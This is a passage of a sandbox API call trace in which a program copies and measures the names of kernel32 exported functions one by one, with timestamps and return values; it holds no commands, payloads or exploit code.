lpString1=0x239f0e8, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0179.125] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0179.125] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0179.125] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0179.125] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0179.125] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0179.125] lstrlenA (lpString="COPYCONTEXT") returned 11 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0179.125] lstrlenA (lpString="COPYFILEA") returned 9 [0179.125] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0179.126] lstrlenA (lpString="COPYFILEEXA") returned 11 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0179.126] lstrlenA (lpString="COPYFILEEXW") returned 11 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0179.126] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0179.126] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0179.126] lstrlenA (lpString="COPYFILEW") returned 9 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0179.126] lstrlenA (lpString="COPYLZFILE") returned 10 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0179.126] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0179.126] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0179.126] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0179.126] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0179.126] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0179.126] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0179.126] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0179.126] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0179.126] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0179.126] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0179.126] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0179.126] lstrlenA (lpString="CREATEEVENTA") returned 12 [0179.126] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0179.126] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0179.127] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0179.127] lstrlenA (lpString="CREATEEVENTW") returned 12 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0179.127] lstrlenA (lpString="CREATEFIBER") returned 11 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0179.127] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0179.127] lstrlenA (lpString="CREATEFILEA") returned 11 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0179.127] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0179.127] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0179.127] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0179.127] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0179.127] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0179.127] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0179.127] lstrlenA (lpString="CREATEFILEW") returned 11 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0179.127] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0179.127] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0179.127] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0179.127] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0179.127] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0179.127] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0179.127] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0179.128] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0179.128] lstrlenA (lpString="CREATEJOBSET") returned 12 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0179.128] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0179.128] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0179.128] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0179.128] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0179.128] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0179.128] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0179.128] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0179.128] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0179.128] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0179.128] lstrlenA (lpString="CREATEPIPE") returned 10 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0179.128] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0179.128] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0179.128] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0179.128] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0179.128] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0179.129] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0179.129] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0179.129] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0179.129] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0179.129] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0179.129] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0179.129] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0179.129] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0179.129] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0179.129] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0179.129] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0179.129] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0179.129] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0179.129] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0179.129] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0179.129] lstrlenA (lpString="CREATETHREAD") returned 12 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0179.129] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0179.129] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0179.129] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0179.130] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0179.130] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0179.130] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0179.130] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0179.130] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0179.130] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0179.130] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0179.130] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0179.130] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0179.130] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0179.130] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0179.130] lstrlenA (lpString="CTRLROUTINE") returned 11 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0179.130] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0179.130] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0179.130] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0179.130] lstrlenA (lpString="DEBUGBREAK") returned 10 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0179.130] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0179.130] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0179.130] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0179.130] lstrlenA (lpString="DECODEPOINTER") returned 13 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0179.131] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0179.131] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0179.131] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0179.131] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0179.131] lstrlenA (lpString="DELETEATOM") returned 10 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0179.131] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0179.131] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0179.131] lstrlenA (lpString="DELETEFIBER") returned 11 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0179.131] lstrlenA (lpString="DELETEFILEA") returned 11 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0179.131] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0179.131] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0179.131] lstrlenA (lpString="DELETEFILEW") returned 11 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0179.131] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0179.131] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0179.131] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0179.131] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0179.131] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0179.131] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0179.131] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0179.132] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0179.132] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0179.132] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0179.132] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0179.132] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0179.132] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0179.132] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0179.132] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0179.132] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0179.132] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0179.132] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0179.132] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0179.132] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0179.132] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0179.132] lstrcpyA (in: lpString1=0x239f0e8, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" 